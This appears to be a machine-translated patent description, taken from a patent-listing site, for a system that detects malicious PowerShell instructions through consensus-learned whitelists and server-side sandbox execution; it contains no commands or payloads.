According to the method for detecting the malicious instructions of the powershell, the powershell calling mode is detected, meanwhile, the whitelist of the matched powershell calling mode is detected, when the powershell executing script or command is detected, the whitelist of the powershell basic behaviors is matched, and the successfully matched powershell behaviors are released; for the powershell behaviors which are not successfully matched, executing powershell scripts or commands need to be placed into an endpoint host buffer area, the powershell scripts or commands are executed and detected by a server sandbox, the scripts or commands can be released by the host buffer area after abnormal behavior judgment, a powershell basic behavior white list is generated by regularly performing information acquisition and common identification mechanism learning on the executed scripts or commands, accurate powershell malicious instruction detection can be achieved, and variable powershell malicious instructions can be effectively identified.

Fig. 6 is a schematic block diagram of a powershell malicious instruction detection system 300 according to an embodiment of the present invention. As shown in fig. 6, the present invention further provides a powershell malicious instruction detection system 300 corresponding to the above powershell malicious instruction detection method. The powershell malicious instruction detection system 300 comprises a unit for executing the powershell malicious instruction detection method, and the powershell malicious instruction detection method can be configured in a server. Specifically, referring to fig. 6, the powershell malicious instruction detection system 300 includes a first obtaining unit 301, a first matching unit 302, a collecting unit 303, a consensus learning unit 304, a sending unit 305, a second obtaining unit 306, an executing unit 307, and a processing unit 308.

A first obtaining unit 301, configured to obtain a powershell calling mode set; a first matching unit 302, configured to match the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set; the acquisition unit 303 is used for acquiring powershell basic information; the consensus learning unit 304 is used for performing powershell data analysis statistics according to the powershell basic information so as to perform consensus mechanism learning, so as to generate a consensus-based powershell basic behavior white list; the sending unit 305 is configured to send the powershell basic behavior white list to a host, and when the host detects that a new powershell instruction is added, the host obtains information of the new powershell instruction, and matches the information of the new powershell instruction with the powershell basic behavior white list to obtain an undetermined instruction aggregate; a second obtaining unit 306, configured to obtain the set of pending instructions; an execution unit 307, configured to place the set of pending instructions in a server sandbox for execution, so as to obtain an execution result; the processing unit 308 is configured to perform blocking and alarm related information on the abnormal instruction according to the execution result, and release the non-abnormal instruction and execute the non-abnormal instruction.

In this embodiment, the first matching unit 302 is configured to filter elements in the powershell calling mode set that are consistent with the whitelist of the powershell calling modes, so as to obtain a legal calling mode set.

In an embodiment, as shown in fig. 7, the consensus learning unit 304 includes a security function set determination subunit 3041, a security command set determination subunit 3042, and a security function call chain set determination subunit 3043.

A security function set determining subunit 3041, configured to perform consensus learning according to all executed powershell function data sets in the host group, and generate a unique powershell security function set of all the host groups, so as to obtain a security function set; a security command set determining subunit 3042, configured to perform consensus learning according to all executed powershell command sets in the host group, and generate a unique powershell security command set of all the host groups to obtain a security command set; the security function call chain set determining subunit 3043 is configured to perform consensus learning according to all powershell function call chain sets in the host group, and generate a unique powershell security function call chain set of the host group, so as to obtain a security function call chain set.

In an embodiment, as shown in fig. 8, the security function set determination subunit 3041 includes a first statistical module 30411, a first screening module 30412, a first integration module 30413, and a first deduplication module 30414.

A first statistical module 30411, configured to compare, for each host in the host group, the powershell function data set executed by the host corresponding to the host with the powershell function data sets executed by other hosts in the host group, and count the times that each powershell function in the powershell function data set executed by the current host corresponds to the other hosts appears in the powershell function data sets executed by the other hosts, so as to obtain a times statistical set of each host; the first screening module 30412 is configured to screen out powershell functions corresponding to elements exceeding a set frequency threshold in the frequency statistic set of each host, so as to form a powershell security function set of each host; a first integration module 30413, configured to integrate the powershell security function set of each host to form a complete security function set; a first deduplication module 30414, configured to perform element deduplication on the entire security function set to obtain a security function set.

In an embodiment, as shown in fig. 9, the safety function call chain set determining subunit 3043 includes a second screening module 30431, a second integrating module 30432, and a second duplication eliminating module 30433.

A second screening module 30431, configured to screen a powershell function call chain, which is matched with the security function set, in the powershell function call chain set corresponding to each host in the host group, so as to obtain a security function call chain set of each host; a second integration module 30432 for integrating the set of security function call chains of each host to form a set of all security function call chains; a second deduplication module 30433, configured to perform element deduplication on the set of all security function call chains to obtain a set of security function call chains.

In an embodiment, the sending unit 305 is configured to send the powershell base behavior white list to a host; when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction; the host screens out elements of a powershell function calling chain in the newly added powershell instruction information, which belong to a security function calling chain set, and powershell commands in the newly added powershell instruction information, which belong to powershell commands corresponding to the elements in a security command set, so as to form security instructions, and the security instructions are released; screening out powershell commands in the newly-added powershell command information by the host computer, wherein the powershell commands do not belong to powershell commands corresponding to elements in the safe command set, so as to form unsafe commands, and blocking the unsafe commands and giving an alarm to relevant information; and screening out the powershell function calling chain in the newly added powershell instruction information which does not belong to the elements in the security function calling chain set but the powershell command in the newly added powershell instruction information which belongs to the powershell command corresponding to the elements in the security command set by the host to form an undetermined instruction set.

It should be noted that, as can be clearly understood by those skilled in the art, for a specific implementation process of the powershell malicious instruction detection system 300 and each unit, reference may be made to the corresponding description in the foregoing method embodiment, and for convenience and brevity of description, no further description is provided herein.

A powershell malicious instruction detection system 300 as described above may be implemented in the form of a computer program that may be run on a computer device as shown in fig. 10.

Referring to fig. 10, fig. 10 is a schematic block diagram of a computer device according to an embodiment of the present application. The computer device 500 may be a server, wherein the server may be an independent server or a server cluster composed of a plurality of servers.

Referring to fig. 10, the computer device 500 includes a processor 502, memory, and a network interface 505 connected by a system bus 501, where the memory may include a non-volatile storage medium 503 and an internal memory 504.

The non-volatile storage medium 503 may store an operating system 5031 and a computer program 5032. The computer programs 5032 include program instructions that, when executed, cause the processor 502 to perform a powershell malicious instruction detection method.

The processor 502 is used to provide computing and control capabilities to support the operation of the overall computer device 500.

The internal memory 504 provides an environment for the execution of the computer program 5032 in the non-volatile storage medium 503, and when the computer program 5032 is executed by the processor 502, the processor 502 may be caused to execute a powershell malicious instruction detection method.

The network interface 505 is used for network communication with other devices. Those skilled in the art will appreciate that the configuration shown in fig. 10 is a block diagram of only a portion of the configuration relevant to the present teachings and is not intended to limit the computing device 500 to which the present teachings may be applied, and that a particular computing device 500 may include more or less components than those shown, or may combine certain components, or have a different arrangement of components.

Wherein the processor 502 is configured to run the computer program 5032 stored in the memory to implement the following steps:

acquiring a powershell calling mode set; matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set; collecting powershell basic information; performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning so as to generate a powershell basic behavior white list based on consensus; sending the powershell basic behavior white list to a host, when the host detects that a new powershell instruction is added, acquiring new powershell instruction information by the host, and matching the new powershell instruction information with the powershell basic behavior white list to obtain an undetermined instruction set; acquiring the set of pending instructions; placing the set of pending instructions in a server sandbox for execution to obtain an execution result; and blocking abnormal instructions and alarming related information according to the execution result, releasing non-abnormal instructions and executing the non-abnormal instructions.

The powershell basic information comprises powershell basic information of each host in the host group main, and the powershell basic information of each host comprises a host code, an executed powershell function data set, a powershell function call chain set and an executed powershell command set.

In an embodiment, when the step of matching the powershell calling mode set with the powershell calling mode white list to obtain the legal calling mode set is implemented by the processor 502, the following steps are specifically implemented:

and screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

In an embodiment, when implementing the step of performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning to generate a powershell basic behavior white list based on consensus, the processor 502 specifically implements the following steps:

performing consensus learning according to all executed powershell function data sets in the host group, and generating a unique powershell safety function set of the host group to obtain a safety function set; performing consensus learning according to all executed powershell command sets in the host group, and generating a unique powershell safety command set of all the host groups to obtain a safety command set; performing consensus learning according to all powershell function call chain sets in the host group, and generating a unique powershell security function call chain set of the host group to obtain a security function call chain set;

the powershell basic behavior white list comprises a security function set, a security command set and a security function call chain set.

In an embodiment, when implementing the step of performing consensus learning according to all executed powershell function data sets in the host group to generate a total and unique powershell security function set of the host group to obtain a security function set, the processor 502 specifically implements the following steps:

comparing the executed powershell function data set corresponding to the host with the executed powershell function data sets corresponding to other hosts in the host group for each host in the host group, and counting the times of each powershell function in the executed powershell function data set corresponding to the current host in the executed powershell function data sets corresponding to the other hosts so as to obtain a time counting set of each host; screening out powershell functions corresponding to elements exceeding a set frequency threshold value in the frequency statistic set of each host to form a powershell safety function set of each host; integrating the powershell security function set of each host to form a whole security function set; and carrying out element duplication removal on all the safety function sets to obtain a safety function set.

In an embodiment, when implementing the step of performing consensus learning according to all powershell function call chain sets in the host group to generate a unique powershell security function call chain set of the host group to obtain a security function call chain set, the processor 502 specifically implements the following steps:

screening powershell function call chains matched with the security function set in the powershell function call chain set corresponding to each host in the host group to obtain a security function call chain set of each host; integrating the set of security function call chains of each host to form a set of complete security function call chains; and carrying out element duplication removal on all the safety function call chain sets to obtain a safety function call chain set.

In an embodiment, when the processor 502 implements the step of sending the powershell basic behavior white list to the host, and when the host detects that a new powershell instruction is added, the host obtains information of the new powershell instruction, and matches the information of the new powershell instruction with the powershell basic behavior white list to obtain a pending instruction aggregation step, the following steps are specifically implemented:

sending the powershell basic behavior white list to a host; when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction; the host screens out elements of a powershell function calling chain in the newly added powershell instruction information, which belong to a security function calling chain set, and powershell commands in the newly added powershell instruction information, which belong to powershell commands corresponding to the elements in a security command set, so as to form security instructions, and the security instructions are released; screening out powershell commands in the newly-added powershell command information by the host computer, wherein the powershell commands do not belong to powershell commands corresponding to elements in the safe command set, so as to form unsafe commands, and blocking the unsafe commands and giving an alarm to relevant information; and screening out the powershell function calling chain in the newly added powershell instruction information which does not belong to the elements in the security function calling chain set but the powershell command in the newly added powershell instruction information which belongs to the powershell command corresponding to the elements in the security command set by the host to form an undetermined instruction set.

In an embodiment, when implementing the blocking of the abnormal instruction and the alarm related information according to the execution result, and releasing the non-abnormal instruction and executing the non-abnormal instruction step, the processor 502 specifically implements the following steps:

when the execution result is that the corresponding instruction is an abnormal instruction, sending a blocking notice of the abnormal instruction to a host of the corresponding instruction according to the execution result, and alarming related information; and when the execution result is that the corresponding instruction is a non-abnormal instruction, sending a release notice of the non-abnormal instruction to the host of the corresponding instruction according to the execution result, and allowing the corresponding host to execute the non-abnormal instruction.

It should be understood that, in the embodiment of the present Application, the Processor 502 may be a Central Processing Unit (CPU) 308, and the Processor 502 may also be other general-purpose processors, Digital Signal Processors (DSPs), Application Specific Integrated Circuits (ASICs), Field-Programmable Gate arrays (FPGAs) or other Programmable logic devices, discrete Gate or transistor logic devices, discrete hardware components, and the like. Wherein a general purpose processor may be a microprocessor or the processor may be any conventional processor or the like.

It will be understood by those skilled in the art that all or part of the flow of the method implementing the above embodiments may be implemented by a computer program instructing associated hardware. The computer program includes program instructions, and the computer program may be stored in a storage medium, which is a computer-readable storage medium. The program instructions are executed by at least one processor in the computer system to implement the flow steps of the embodiments of the method described above.

Accordingly, the present invention also provides a storage medium. The storage medium may be a computer-readable storage medium. The storage medium stores a computer program, wherein the computer program, when executed by a processor, causes the processor to perform the steps of:

In an embodiment, when the processor executes the computer program to implement the step of matching the powershell calling mode set with a powershell calling mode white list to obtain a legal calling mode set, the following steps are specifically implemented:

and screening elements in the powershell calling mode set, which are consistent with the powershell calling mode white list, so as to obtain a legal calling mode set.

In an embodiment, when the processor executes the computer program to implement the step of performing powershell data analysis statistics according to the powershell basic information to perform consensus mechanism learning to generate a powershell basic behavior white list based on consensus, the following steps are specifically implemented:

the powershell basic behavior white list comprises a security function set, a security command set and a security function call chain set.

In an embodiment, when the processor executes the computer program to perform the step of performing consensus learning according to all executed powershell function data sets in the host group and generating a total and unique powershell security function set of the host group to obtain the security function set, the following steps are specifically implemented:

In an embodiment, when the processor executes the computer program to perform the step of performing consensus learning according to all powershell function call chain sets in the host group and generating all and unique powershell security function call chain sets of the host group to obtain a security function call chain set, the following steps are specifically implemented:

In an embodiment, the processor executes the computer program to implement the sending of the powershell basic behavior white list to the host, and when the host detects that a new powershell instruction is added, the host obtains newly added powershell instruction information, and matches the newly added powershell instruction information with the powershell basic behavior white list to obtain a pending instruction aggregation step, the following steps are specifically implemented:

sending the powershell basic behavior white list to a host;

when the host computer detects that a new powershell instruction is added, the host computer obtains information of the new powershell instruction; the host screens out elements of a powershell function calling chain in the newly added powershell instruction information, which belong to a security function calling chain set, and powershell commands in the newly added powershell instruction information, which belong to powershell commands corresponding to the elements in a security command set, so as to form security instructions, and the security instructions are released; screening out powershell commands in the newly-added powershell command information by the host computer, wherein the powershell commands do not belong to powershell commands corresponding to elements in the safe command set, so as to form unsafe commands, and blocking the unsafe commands and giving an alarm to relevant information; and screening out the powershell function calling chain in the newly added powershell instruction information which does not belong to the elements in the security function calling chain set but the powershell command in the newly added powershell instruction information which belongs to the powershell command corresponding to the elements in the security command set by the host to form an undetermined instruction set.

In an embodiment, when the processor executes the computer program to implement the blocking of the abnormal instruction and the alarm related information according to the execution result, and releases the non-abnormal instruction and executes the non-abnormal instruction step, the following steps are specifically implemented:

The storage medium may be a usb disk, a removable hard disk, a Read-Only Memory (ROM), a magnetic disk, or an optical disk, which can store various computer readable storage media.

Those of ordinary skill in the art will appreciate that the elements and algorithm steps of the examples described in connection with the embodiments disclosed herein may be embodied in electronic hardware, computer software, or combinations of both, and that the components and steps of the examples have been described in a functional general in the foregoing description for the purpose of illustrating clearly the interchangeability of hardware and software. Whether such functionality is implemented as hardware or software depends upon the particular application and design constraints imposed on the implementation. Skilled artisans may implement the described functionality in varying ways for each particular application, but such implementation decisions should not be interpreted as causing a departure from the scope of the present invention.

In the embodiments provided in the present invention, it should be understood that the disclosed apparatus and method may be implemented in other ways. For example, the above-described apparatus embodiments are merely illustrative. For example, the division of each unit is only one logic function division, and there may be another division manner in actual implementation. For example, various elements or components may be combined or may be integrated into another system, or some features may be omitted, or not implemented.

The steps in the method of the embodiment of the invention can be sequentially adjusted, combined and deleted according to actual needs. The units in the device of the embodiment of the invention can be merged, divided and deleted according to actual needs. In addition, functional units in the embodiments of the present invention may be integrated into one processing unit 308, or each unit may exist alone physically, or two or more units are integrated into one unit.

The integrated unit, if implemented in the form of a software functional unit and sold or used as a stand-alone product, may be stored in a storage medium. Based on such understanding, the technical solution of the present invention essentially or partially contributes to the prior art, or all or part of the technical solution can be embodied in the form of a software product, which is stored in a storage medium and includes instructions for causing a computer device (which may be a personal computer, a terminal, or a network device) to execute all or part of the steps of the method according to the embodiments of the present invention.

While the invention has been described with reference to specific embodiments, the invention is not limited thereto, and various equivalent modifications and substitutions can be easily made by those skilled in the art within the technical scope of the invention. Therefore, the protection scope of the present invention shall be subject to the protection scope of the claims.

28页详细技术资料下载

上一篇：一种医用注射器针头装配设备

下一篇：一种用于安卓攻击场景重建的可视化取证系统及实现方法

Powershell malicious instruction detection method and system

相关技术

网友询问留言